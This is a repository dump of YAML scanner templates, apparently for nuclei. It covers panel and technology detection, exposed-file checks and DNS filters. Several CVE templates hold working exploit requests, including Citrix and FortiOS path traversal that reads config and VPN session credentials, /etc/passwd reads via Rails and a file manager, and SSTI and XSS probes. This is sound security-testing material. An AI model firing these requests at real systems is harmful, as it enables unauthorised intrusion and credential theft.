├── .yamllint
├── files
├── git-config.yaml
├── wp-xmlrpc.yaml
├── debug-pprof.yaml
├── dir-listing.yaml
├── exposed-svn.yaml
├── jkstatus-manager.yaml
├── drupal-install.yaml
├── laravel-env.yaml
├── telerik-fileupload-detect.yaml
├── wordpress-user-enumaration.yaml
├── jolokia.yaml
├── tomcat.yaml
├── firebase-detect.yaml
├── tomcat-scripts.yaml
├── apc_info.yaml
├── docker-registry.yaml
├── elasticsearch.yaml
├── wadl-files.yaml
├── security.txt.yaml
├── server-status-localhost.yaml
├── phpinfo.yaml
└── zip-backup-files.yaml
├── .pre-commit-config.yaml
├── examples
├── basic-http-example.yaml
├── basic-dns-example.yaml
├── dns-multiple-example.yaml
├── http-raw.yaml
├── http-multiple-matcher.yaml
├── http-multiple-matcher-condition.yaml
├── http-raw-multiple.yaml
└── http-intruder-fuzz.yaml
├── panels
├── crxde.yaml
├── grafana-detect.yaml
├── docker-api.yaml
├── compal.yaml
├── mongo-express-web-gui.yaml
├── supervpn-panel.yaml
├── fortinet-fortigate-panel.yaml
├── cisco-asa-panel.yaml
├── globalprotect-panel.yaml
├── parallels-html-client.yaml
├── jenkins-asyncpeople.yaml
├── kubernetes-pods.yaml
├── sap-netweaver-detect.yaml
├── pulse-secure-panel.yaml
├── swagger-panel.yaml
├── sophos-fw-version-detect.yaml
├── phpmyadmin-panel.yaml
└── webeditors.yaml
├── technologies
├── sap-netweaver-detect.yaml
├── citrix-vpn-detect.yaml
├── github-enterprise-detect.yaml
├── home-assistant.yaml
├── jenkins-headers-detect.yaml
├── s3-detect.yaml
├── sql-server-reporting.yaml
├── tool-detect.yaml
├── aem-cms-finder.yaml
├── weblogic-detect.yaml
├── werkzeug-debugger-detect.yaml
├── jira-detect.yaml
├── gitlab-detect.yaml
├── jaspersoft-detect.yaml
├── reverse-proxy-detect.yaml
├── graphql.yaml
├── cms-detect.yaml
├── programming-language-detect.yaml
├── web-framework-detect.yaml
├── cdn.yaml
├── linkerd-badrule-detect.yaml
├── linkerd-ssrf-detect.yaml
├── web-server.yaml
├── ntlm-directories.yaml
└── tech-detect.yaml
├── cves
├── CVE-2019-19781.yaml
├── CVE-2018-16341.yaml
├── CVE-2018-13379.yaml
├── CVE-2018-6389.yaml
├── CVE-2017-9506.yaml
├── CVE-2018-3760.yaml
├── CVE-2018-14728.yaml
├── CVE-2018-1247.yaml
├── CVE-2020-5284.yaml
├── CVE-2019-12314.yaml
├── CVE-2020-2096.yaml
├── CVE-2018-7490.yaml
├── CVE-2019-19368.yaml
├── CVE-2019-8982.yaml
├── CVE-2020-8115.yaml
├── CVE-2019-3799.yaml
├── CVE-2019-19908.yaml
├── CVE-2018-18069.yaml
├── CVE-2018-5230.yaml
├── CVE-2019-8903.yaml
├── CVE-2018-2791.yaml
├── CVE-2018-20824.yaml
├── CVE-2019-5418.yaml
├── CVE-2019-14974.yaml
├── CVE-2018-19439.yaml
├── CVE-2020-8512.yaml
├── CVE-2019-11510.yaml
├── CVE-2018-1000129.yaml
├── CVE-2020-5410.yaml
├── CVE-2018-0296.yaml
├── CVE-2019-2588.yaml
├── CVE-2018-1271.yaml
├── CVE-2017-7529.yaml
├── CVE-2019-3396.yaml
├── CVE-2020-12720.yaml
└── CVE-2019-10475.yaml
├── vulnerabilities
├── twig-php-ssti.yaml
├── rce-shellshock-user-agent.yaml
├── wordpress-duplicator-path-traversal.yaml
├── moodle-filter-jmol-xss.yaml
├── discourse-xss.yaml
├── wordpress-wordfence-xss.yaml
├── moodle-filter-jmol-lfi.yaml
├── x-forwarded-host-injection.yaml
├── crlf-injection.yaml
├── cached-aem-pages.yaml
├── pdf-signer-ssti-to-rce.yaml
└── open-redirect.yaml
├── dns
├── servfail-refused-hosts.yaml
├── filter-valid.yaml
├── filter-wildcard.yaml
├── dead-host-with-cname.yaml
├── cname-service-detector.yaml
├── azure-cnames-finder.yaml
└── azure-takeover-detection.yaml
├── subdomain-takeover
├── pantheon.io.yaml
├── worksites-takeover.yaml
└── detect-all-takeovers.yaml
├── .github
└── workflows
│ └── syntax-checking.yml
├── security-misconfiguration
├── basic-cors-flash.yaml
├── rack-mini-profiler.yaml
├── basic-cors.yaml
├── front-page-misconfig.yaml
├── jira-service-desk-signup.yaml
└── springboot-detect.yaml
├── basic-detections
├── basic-xss-prober.yaml
└── general-tokens.yaml
├── tokens
├── google-api-key.yaml
├── mailchimp-api-key.yaml
├── aws-access-key-value.yaml
├── amazon-mws-auth-token-value.yaml
├── http-username-password.yaml
└── slack-access-token.yaml
├── README.md
├── LICENSE
└── GUIDE.md
/.yamllint:
--------------------------------------------------------------------------------
1 | ---
2 | extends: default
3 |
4 | rules:
5 | document-start: disable
6 | line-length: disable
7 | new-lines: disable
8 | new-line-at-end-of-file: disable
9 | truthy: disable
10 |
--------------------------------------------------------------------------------
/files/git-config.yaml:
--------------------------------------------------------------------------------
1 | id: git-config
2 |
3 | info:
4 | name: Git Config Disclosure
5 | author: Ice3man
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/.git/config"
12 | matchers:
13 | - type: word
14 | words:
15 | - "[core]"
16 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | repos:
2 | - repo: https://github.com/pre-commit/pre-commit-hooks
3 | rev: v2.3.0
4 | hooks:
5 | - id: end-of-file-fixer
6 | - id: trailing-whitespace
7 | - repo: https://github.com/adrienverge/yamllint.git
8 | rev: v1.17.0
9 | hooks:
10 | - id: yamllint
11 |
--------------------------------------------------------------------------------
/examples/basic-http-example.yaml:
--------------------------------------------------------------------------------
1 | id: basic-http-test
2 |
3 | info:
4 | name: Test File
5 | author: pdteam
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/test.txt"
12 | matchers:
13 | - type: word
14 | words:
15 | - "This is test!"
16 |
--------------------------------------------------------------------------------
/files/wp-xmlrpc.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-xmlrpc-file
2 |
3 | info:
4 | name: WordPress xmlrpc
5 | author: udit_thakkur
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/xmlrpc.php"
12 | matchers:
13 | - type: status
14 | status:
15 | - 405
16 |
--------------------------------------------------------------------------------
/panels/crxde.yaml:
--------------------------------------------------------------------------------
1 | id: crxde
2 |
3 | info:
4 | name: CRXDE Lite
5 | author: nadino
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/crx/de/index.jsp"
12 | matchers:
13 | - type: word
14 | words:
15 | - "
CRXDE Lite"
16 |
--------------------------------------------------------------------------------
/files/debug-pprof.yaml:
--------------------------------------------------------------------------------
1 | id: debug-pprof
2 |
3 | info:
4 | name: pprof debug file
5 | author: pdteam
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/debug/pprof/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Types of profiles available"
16 |
--------------------------------------------------------------------------------
/technologies/sap-netweaver-detect.yaml:
--------------------------------------------------------------------------------
1 | id: SAP-Netweaver-Detect
2 | info:
3 | name: SAP NetWeaver Detect
4 | author: rakeshmane10
5 | severity: informative
6 | requests:
7 | - method: GET
8 | path:
9 | - '{{BaseURL}}/irj/portal'
10 | matchers:
11 | - type: word
12 | words:
13 | - NetWeaver
14 |
--------------------------------------------------------------------------------
/cves/CVE-2019-19781.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2019-19781
2 |
3 | info:
4 | name: Citrix ADC Directory Traversal
5 | author: organiccrap
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
12 | matchers:
13 | - type: word
14 | words:
15 | - "[global]"
16 |
--------------------------------------------------------------------------------
/files/dir-listing.yaml:
--------------------------------------------------------------------------------
1 | id: dir-listing
2 |
3 | info:
4 | name: Directory listing enabled
5 | author: _harleo
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Index of /"
16 | - "[To Parent Directory]"
17 |
--------------------------------------------------------------------------------
/panels/grafana-detect.yaml:
--------------------------------------------------------------------------------
1 | id: grafana-detect
2 |
3 | info:
4 | name: Grafana panel detect
5 | author: organiccrap
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/login"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Grafana"
16 | part: body
17 |
--------------------------------------------------------------------------------
/technologies/citrix-vpn-detect.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-vpn-detect
2 |
3 | info:
4 | name: Citrix VPN Detection
5 | author: bauthard
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/vpn/index.html"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Citrix Gateway"
16 |
--------------------------------------------------------------------------------
/technologies/github-enterprise-detect.yaml:
--------------------------------------------------------------------------------
1 | id: Github-Enterprise-Detect
2 |
3 | info:
4 | name: Detect Github Enterprise
5 | author: ehsahil
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/login"
12 | matchers:
13 | - type: word
14 | words:
15 | - "GitHub · Enterprise"
16 |
--------------------------------------------------------------------------------
/panels/docker-api.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-docker-api
2 |
3 | info:
4 | name: Exposed Docker API
5 | author: furkansenan
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - '{{BaseURL}}:2376/version'
12 | matchers:
13 | - type: word
14 | words:
15 | - "Version"
16 | - "Docker"
17 | part: body
18 |
--------------------------------------------------------------------------------
/technologies/home-assistant.yaml:
--------------------------------------------------------------------------------
1 | id: home-assistant
2 |
3 | info:
4 | name: Detect Home Assistant
5 | author: fabaff
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}:8123/"
12 | - "{{BaseURL}}/"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Home Assistant"
17 |
--------------------------------------------------------------------------------
/technologies/jenkins-headers-detect.yaml:
--------------------------------------------------------------------------------
1 | id: jenkins-headers-detect
2 |
3 | info:
4 | name: Jenkins Headers Based Detection
5 | author: ice3man
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "X-Jenkins"
16 | part: header
17 |
--------------------------------------------------------------------------------
/panels/compal.yaml:
--------------------------------------------------------------------------------
1 | id: compal-panel-detect
2 |
3 | info:
4 | name: Compal CH7465LG panel detect
5 | author: fabaff
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/common_page/login.html"
12 | matchers:
13 | - type: word
14 | words:
15 | - ""
16 | part: body
17 |
--------------------------------------------------------------------------------
/panels/mongo-express-web-gui.yaml:
--------------------------------------------------------------------------------
1 | id: mongo-express-web-gui
2 |
3 | info:
4 | name: Mongo Express Web GUI
5 | author: puzzlepeaches
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Set-Cookie: mongo-express="
16 | part: header
17 |
--------------------------------------------------------------------------------
/technologies/s3-detect.yaml:
--------------------------------------------------------------------------------
1 | id: s3-detect
2 |
3 | info:
4 | name: Detect Amazon-S3 Bucket
5 | author: melbadry9
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/%c0"
12 | matchers:
13 | - type: regex
14 | regex:
15 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)"
16 | part: body
17 |
--------------------------------------------------------------------------------
/files/exposed-svn.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-svn
2 |
3 | info:
4 | name: Exposed SVN Directory
5 | author: udit_thakkur
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/.svn/entries"
12 | matchers:
13 | - type: word
14 | words:
15 | - "dir"
16 | - type: status
17 | status:
18 | - 200
19 |
--------------------------------------------------------------------------------
/panels/supervpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: supervpn-detect
2 |
3 | info:
4 | name: SuperVPN panel detect
5 | author: organiccrap
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/admin/login.html"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Sign In-SuperVPN"
16 | part: body
17 |
--------------------------------------------------------------------------------
/technologies/sql-server-reporting.yaml:
--------------------------------------------------------------------------------
1 | id: sql-server-reporting
2 |
3 | info:
4 | name: Detect Microsoft SQL Server Reporting
5 | author: puzzlepeaches
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/Reports/Pages/Folder.aspx"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Report Manager"
16 |
--------------------------------------------------------------------------------
/vulnerabilities/twig-php-ssti.yaml:
--------------------------------------------------------------------------------
1 | id: twig-php-ssti
2 |
3 | info:
4 | name: Twig PHP <2.4.4 template engine - SSTI
5 | author: madrobot
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/search?search_key={{1337*1338}}"
12 | matchers:
13 | - type: word
14 | words:
15 | - "1788906"
16 | part: body
17 |
--------------------------------------------------------------------------------
/cves/CVE-2018-16341.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-16341
2 |
3 | info:
4 | name: Nuxeo Authentication Bypass Remote Code Execution
5 | author: madrobot
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${1330+7}.xhtml"
12 | matchers:
13 | - type: word
14 | words:
15 | - "1337"
16 | part: body
17 |
--------------------------------------------------------------------------------
/panels/fortinet-fortigate-panel.yaml:
--------------------------------------------------------------------------------
1 | id: fortinet-fortigate-panel
2 |
3 | info:
4 | name: Fortinet FortiGate SSL VPN Panel
5 | author: bsysop
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/remote/login"
12 | matchers:
13 | - type: word
14 | words:
15 | - "/remote/fgt_lang"
16 | part: body
17 |
--------------------------------------------------------------------------------
/technologies/tool-detect.yaml:
--------------------------------------------------------------------------------
1 | id: tool-detect
2 |
3 | info:
4 | name: Tool Detect
5 | author: NkxxkN https://twitter.com/NkkxN
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: word
14 | name: clockwork
15 | words:
16 | - "X-Clockwork-Id"
17 | part: header
18 |
--------------------------------------------------------------------------------
/cves/CVE-2018-13379.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-13379
2 |
3 | info:
4 | name: FortiOS - Credentials Disclosure
5 | author: organiccrap
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
12 | matchers:
13 | - type: word
14 | words:
15 | - "var fgt_lang ="
16 |
--------------------------------------------------------------------------------
/dns/servfail-refused-hosts.yaml:
--------------------------------------------------------------------------------
1 | id: servfail-refused-hosts
2 |
3 | info:
4 | name: Servfail Host Finder
5 | author: mzack9999
6 | severity: informative
7 |
8 | dns:
9 | - name: "{{FQDN}}"
10 | type: A
11 | class: inet
12 | recursion: true
13 | retries: 3
14 | matchers:
15 | - type: word
16 | words:
17 | - "SERVFAIL"
18 | - "REFUSED"
19 |
--------------------------------------------------------------------------------
/panels/cisco-asa-panel.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-asa-panel-detect
2 |
3 | info:
4 | name: Cisco ASA VPN panel detect
5 | author: organiccrap
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/+CSCOE+/logon.html"
12 | matchers:
13 | - type: word
14 | words:
15 | - "SSL VPN Service"
16 | part: body
17 |
--------------------------------------------------------------------------------
/panels/globalprotect-panel.yaml:
--------------------------------------------------------------------------------
1 | id: globalprotect-panel
2 |
3 | info:
4 | name: PaloAlto Networks GlobalProtect Panel
5 | author: organiccrap
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/global-protect/login.esp"
12 | matchers:
13 | - type: word
14 | words:
15 | - "GlobalProtect Portal"
16 |
--------------------------------------------------------------------------------
/subdomain-takeover/pantheon.io.yaml:
--------------------------------------------------------------------------------
1 | id: pantheon-io-takeover
2 |
3 | info:
4 | name: Find Pantheon.io subdomain takeover
5 | author: pxmme1337
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "The gods are wise, but do not know of the site which you seek."
16 |
--------------------------------------------------------------------------------
/files/jkstatus-manager.yaml:
--------------------------------------------------------------------------------
1 | id: jkstatus-manager
2 |
3 | info:
4 | name: JK Status Manager
5 | author: bauthard
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | headers:
11 | X-Forwarded-For: "127.0.0.1"
12 | path:
13 | - "{{BaseURL}}/jkstatus/"
14 | matchers:
15 | - type: word
16 | words:
17 | - "JK Status Manager"
18 |
--------------------------------------------------------------------------------
/panels/parallels-html-client.yaml:
--------------------------------------------------------------------------------
1 | id: parallels-html-client
2 |
3 | info:
4 | name: Parallels HTML5 Client
5 | author: bauthard
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/RASHTML5Gateway/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Parallels HTML5 Client"
16 | part: body
17 |
--------------------------------------------------------------------------------
/files/drupal-install.yaml:
--------------------------------------------------------------------------------
1 | id: drupal-install
2 |
3 | info:
4 | name: Drupal Install
5 | author: NkxxkN
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/install.php?profile=default"
12 | redirects: true
13 | max-redirects: 1
14 | matchers:
15 | - type: word
16 | words:
17 | - "Choose language | Drupal"
18 |
--------------------------------------------------------------------------------
/files/laravel-env.yaml:
--------------------------------------------------------------------------------
1 | id: laravel-env
2 |
3 | info:
4 | name: Laravel .env file
5 | author: pxmme1337
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/.env"
12 | matchers-condition: and
13 | matchers:
14 | - type: word
15 | words:
16 | - "APP_NAME"
17 | - type: status
18 | status:
19 | - 200
20 |
--------------------------------------------------------------------------------
/technologies/aem-cms-finder.yaml:
--------------------------------------------------------------------------------
1 | id: aem-cms-finder
2 |
3 | info:
4 | name: AEM Finder
5 | author: mzack9999
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}"
12 | matchers:
13 | - type: word
14 | words:
15 | - "/etc/clientlibs/"
16 | - "/content/dam/"
17 | part: body
18 | condition: or
19 |
--------------------------------------------------------------------------------
/technologies/weblogic-detect.yaml:
--------------------------------------------------------------------------------
1 | id: WebLogic-Detect
2 |
3 | info:
4 | name: Detect Weblogic
5 | author: bing0o
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}:7001/console/login/LoginForm.jsp"
12 | - "{{BaseURL}}/console/login/LoginForm.jsp"
13 | matchers:
14 | - type: word
15 | words:
16 | - "WebLogic"
17 |
--------------------------------------------------------------------------------
/cves/CVE-2018-6389.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-6389
2 |
3 | info:
4 | name: Wordpress Load Script
5 | author: nadino
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/wp-admin/load-scripts.php?load="
12 | matchers:
13 | - type: dsl
14 | dsl:
15 | - 'contains(x_powered_by,"Engine")'
16 | - 'contains(content_type,"javascript")'
17 |
--------------------------------------------------------------------------------
/panels/jenkins-asyncpeople.yaml:
--------------------------------------------------------------------------------
1 | id: jenkins-async-people
2 |
3 | info:
4 | name: Jenkins panel async-people
5 | author: nadino
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/asynchPeople/"
12 | matchers:
13 | - type: word
14 | words:
15 | - "People - [Jenkins]"
16 | part: body
17 |
--------------------------------------------------------------------------------
/cves/CVE-2017-9506.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2017-9506
2 |
3 | info:
4 | name: Jira IconURIServlet SSRF
5 | author: Ice3man
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
12 | matchers:
13 | - type: word
14 | words:
15 | - "ipinfo.io/missingauth"
16 | part: body
17 |
--------------------------------------------------------------------------------
/examples/basic-dns-example.yaml:
--------------------------------------------------------------------------------
1 | id: basic-dns-example
2 |
3 | info:
4 | name: Basic DNS Request
5 | author: pdteam
6 | severity: info
7 |
8 | dns:
9 | - name: "{{FQDN}}"
10 | type: CNAME
11 | class: inet
12 | recursion: true
13 | retries: 3
14 | matchers:
15 | - type: word
16 | words:
17 | # The response must contains a CNAME record
18 | - "IN\tCNAME"
19 |
--------------------------------------------------------------------------------
/subdomain-takeover/worksites-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: worksites-takeover
2 |
3 | info:
4 | name: Find worksites-takeover
5 | author: melbadry9
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/"
12 | matchers:
13 | - type: regex
14 | regex:
15 | - "(?:Company Not Found|you’re looking for doesn’t exist)"
16 | part: body
17 |
--------------------------------------------------------------------------------
/dns/filter-valid.yaml:
--------------------------------------------------------------------------------
1 | id: filter-valid
2 |
3 | info:
4 | name: Valid Domains Filter
5 | author: mzack9999
6 | severity: informative
7 |
8 | dns:
9 | - name: "{{FQDN}}" # Random prefix
10 | type: A
11 | class: inet
12 | recursion: true
13 | retries: 3
14 | matchers:
15 | - type: word
16 | words:
17 | - "NOERROR"
18 | - "IN\tCNAME"
19 | - "IN\tA"
20 |
--------------------------------------------------------------------------------
/technologies/werkzeug-debugger-detect.yaml:
--------------------------------------------------------------------------------
1 | id: werkzeug-debugger-detect
2 |
3 | info:
4 | name: Werkzeug debugger console
5 | author: pdnuclei - projectdiscovery.io
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/console"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Interactive Console
"
16 | part: body
17 |
--------------------------------------------------------------------------------
/technologies/jira-detect.yaml:
--------------------------------------------------------------------------------
1 | id: jira-detect
2 |
3 | info:
4 | name: Detect Jira Issue Management Software
5 | author: bauthard
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/secure/Dashboard.jspa"
12 | - "{{BaseURL}}/jira/secure/Dashboard.jspa"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Project Management Software"
17 |
--------------------------------------------------------------------------------
/cves/CVE-2018-3760.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-3760
2 |
3 | info:
4 | name: Rails cve-2018-3760
5 | author: 0xrudra
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
12 | matchers:
13 | - type: status
14 | status:
15 | - 200
16 | - type: regex
17 | regex:
18 | - "root:[x*]:0:0:"
19 | part: body
20 |
--------------------------------------------------------------------------------
/files/telerik-fileupload-detect.yaml:
--------------------------------------------------------------------------------
1 | id: telerik-fileupload-detect
2 |
3 | info:
4 | name: Detect Telerik Web UI fileupload handler
5 | author: organiccrap
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
12 | matchers:
13 | - type: word
14 | words:
15 | - "RadAsyncUpload handler is registered successfully"
16 |
--------------------------------------------------------------------------------
/.github/workflows/syntax-checking.yml:
--------------------------------------------------------------------------------
1 | name: syntax-checking
2 |
3 | on: [push, pull_request]
4 |
5 | jobs:
6 | build:
7 | runs-on: ubuntu-latest
8 | steps:
9 | - uses: actions/checkout@v2
10 | - name: Yamllint
11 | uses: karancode/yamllint-github-action@master
12 | with:
13 | yamllint_config_filepath: .yamllint
14 | yamllint_strict: false
15 | yamllint_comment: true
16 |
--------------------------------------------------------------------------------
/dns/filter-wildcard.yaml:
--------------------------------------------------------------------------------
1 | id: filter-wildcard
2 |
3 | info:
4 | name: Wildcard Filter
5 | author: mzack9999
6 | severity: informative
7 |
8 | dns:
9 | - name: "0831058744.{{FQDN}}" # Random prefix
10 | type: A
11 | class: inet
12 | recursion: true
13 | retries: 3
14 | matchers:
15 | - type: word
16 | words:
17 | - "NXDOMAIN"
18 | - "SERVFAIL"
19 | - "REFUSED"
20 |
--------------------------------------------------------------------------------
/files/wordpress-user-enumaration.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-user-enumaration
2 |
3 | info:
4 | name: Wordpress user enumeration
5 | author: Manas_Harsh
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/wp-json/wp/v2/users/"
12 | matchers:
13 | - type: status
14 | status:
15 | - 200
16 | - type: word
17 | words:
18 | - avatar_urls
19 |
--------------------------------------------------------------------------------
/cves/CVE-2018-14728.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-14728
2 |
3 | info:
4 | name: Responsive filemanager 9.13.1 - SSRF/LFI
5 | author: madrobot
6 | severity: high
7 |
8 | requests:
9 | - method: POST
10 | path:
11 | - "{{BaseURL}}/filemanager/upload.php"
12 |
13 | body: "fldr=&url=file:///etc/passwd"
14 |
15 | matchers:
16 | - type: regex
17 | regex:
18 | - "root:[x*]:0:0:"
19 | part: body
20 |
--------------------------------------------------------------------------------
/files/jolokia.yaml:
--------------------------------------------------------------------------------
1 | id: jolokia instance
2 |
3 | info:
4 | name: Jolokia Version Disclosure
5 | author: mavericknerd
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - '{{BaseURL}}/jolokia/version'
12 | - '{{BaseURL}}:8080/jolokia/version'
13 | matchers:
14 | - type: word
15 | words:
16 | - '"agent":'
17 | - type: status
18 | status:
19 | - 200
20 |
--------------------------------------------------------------------------------
/security-misconfiguration/basic-cors-flash.yaml:
--------------------------------------------------------------------------------
1 | id: basic-cors-misconfig-flash
2 |
3 | info:
4 | name: Basic CORS misconfiguration exploitable with Flash
5 | author: nadino
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/crossdomain.xml"
12 | matchers:
13 | - type: word
14 | words:
15 | - 'allow-access-from domain="*"'
16 | part: body
17 |
--------------------------------------------------------------------------------
/basic-detections/basic-xss-prober.yaml:
--------------------------------------------------------------------------------
1 | id: basic-xss-prober
2 |
3 | info:
4 | name: Basic XSS Prober
5 | author: nadino
6 | severity: low
7 |
8 | # Basic XSS prober
9 | # Manual testing needed for exploitation
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e"
15 | matchers:
16 | - type: word
17 | words:
18 | - "'>"
19 |
--------------------------------------------------------------------------------
/cves/CVE-2018-1247.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-1247
2 |
3 | info:
4 | name: RSA Authentication Manager XSS
5 | author: madrobot
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
12 | matchers:
13 | - type: word
14 | words:
15 | - "application/x-shockwave-flash"
16 | part: header
17 |
--------------------------------------------------------------------------------
/files/tomcat.yaml:
--------------------------------------------------------------------------------
1 | id: tomcat-instance
2 |
3 | info:
4 | name: tomcat manager disclosure
5 | author: Ahmed Sherif
6 | severity: informative
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - '{{BaseURL}}/manager/html'
12 | - '{{BaseURL}}:8080/manager/html'
13 | matchers:
14 | - type: word
15 | words:
16 | - '"Unauthorized":'
17 | - type: status
18 | status:
19 | - 401
20 |
--------------------------------------------------------------------------------
/security-misconfiguration/rack-mini-profiler.yaml:
--------------------------------------------------------------------------------
1 | id: rack-mini-profiler
2 |
3 | info:
4 | name: rack-mini-profiler environmnet information discloure
5 | author: vzamanillo
6 | severity: high
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/?pp=env"
12 | matchers:
13 | - type: word
14 | words:
15 | - "Rack Environment"
16 | - type: status
17 | status:
18 | - 200
19 |
--------------------------------------------------------------------------------
/cves/CVE-2020-5284.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2020-5284
2 |
3 | info:
4 | name: Next.js .next/ limited path traversal
5 | author: Harsh & Rahul
6 | severity: medium
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/_next/static/../server/pages-manifest.json"
12 | matchers:
13 | - type: regex
14 | regex:
15 | - '\{"/_app":".*?_app\.js"'
16 | - type: status
17 | status:
18 | - 200
19 |
--------------------------------------------------------------------------------
/files/firebase-detect.yaml:
--------------------------------------------------------------------------------
1 | id: firebase-detect
2 |
3 | info:
4 | name: firebase detect
5 | author: organiccrap
6 | severity: low
